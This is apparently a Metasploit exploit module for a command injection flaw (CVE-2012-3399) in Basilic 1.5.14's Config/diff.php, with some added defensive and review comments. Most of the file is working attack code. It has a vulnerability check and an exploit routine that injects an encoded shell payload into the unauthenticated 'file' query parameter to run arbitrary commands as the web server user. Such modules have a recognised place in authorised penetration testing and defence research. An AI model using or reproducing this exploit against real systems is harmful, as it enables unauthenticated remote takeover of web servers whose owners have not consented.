GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/basilic_diff_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
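# Metasploit module for the Basilic 1.5.14 diff.php command injection
# (CVE-2012-3399). Both the check and the exploit issue one unauthenticated
# GET request to <TARGETURI>/Config/diff.php with `file`, `new` and `old`
# query parameters.
#
# Defensive notes, grounded in the requests built below:
# * Detection: web-server or proxy logs showing requests to Config/diff.php
#   whose `file` parameter carries shell metacharacters (the exploit request
#   prefixes the value with `&` and ends it with ` #`).
# * Mitigation: this listing names no fixed version; until the application is
#   patched or removed, denying web access to the Config/ directory removes
#   the endpoint both requests depend on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
      'Description'    => %q{
        This module abuses a metacharacter injection vulnerability in the
        diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
        commands as the www-data user account.
      },
      'Author'         =>
        [
          'lcashdollar',
          'sinn3r',
          'juan vazquez'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-3399' ],
          [ 'OSVDB', '83719' ],
          [ 'BID', '54234' ]
        ],
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      # NOTE(review): the description says commands run as www-data, which is
      # normally an unprivileged account; confirm whether `true` is intended.
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby python telnet'
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2012-06-28'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
      ])
  end

  # Requests Config/diff.php with a random 10-letter marker in the `file`
  # parameter and reports Vulnerable when a 200 response echoes the marker.
  #
  # NOTE(review): an echoed marker only shows that the script reflects the
  # parameter; it does not demonstrate command execution, so this result can
  # be a false positive. Confirm whether a weaker check code is more accurate.
  #
  # @return [Exploit::CheckCode] Vulnerable if the marker is echoed, else Safe
  def check
    base = normalize_uri(target_uri.path)

    sig = rand_text_alpha(10)

    res = send_request_cgi({
      'uri'      => normalize_uri("/#{base}/Config/diff.php"),
      'vars_get' => {
        'file' => sig,
        'new'  => '1',
        'old'  => '2'
      }
    })

    # No response, a non-200 status, or a body without the marker all mean Safe.
    if res && res.code == 200 && res.body =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Sends one GET request to Config/diff.php with the encoded command payload
  # placed in the `file` parameter, reports the HTTP outcome, then calls
  # `handler`.
  def exploit
    print_status("Sending GET request...")

    base = normalize_uri(target_uri.path)

    res = send_request_cgi({
      'uri'      => normalize_uri("/#{base}/Config/diff.php"),
      'vars_get' => {
        'file' => "&#{payload.encoded} #",
        'new'  => '1',
        'old'  => '2'
      }
    })

    # The request can return nil (for example on a timeout). The original
    # else-branch called res.code without a nil guard and raised
    # NoMethodError before `handler` was reached.
    if res.nil?
      vprint_status("No response received from the server")
    elsif res.code == 404
      print_error("404 Basilic not installed or possibly check URI Path.")
    else
      vprint_line("Server returned #{res.code}")
    end

    handler
  end
end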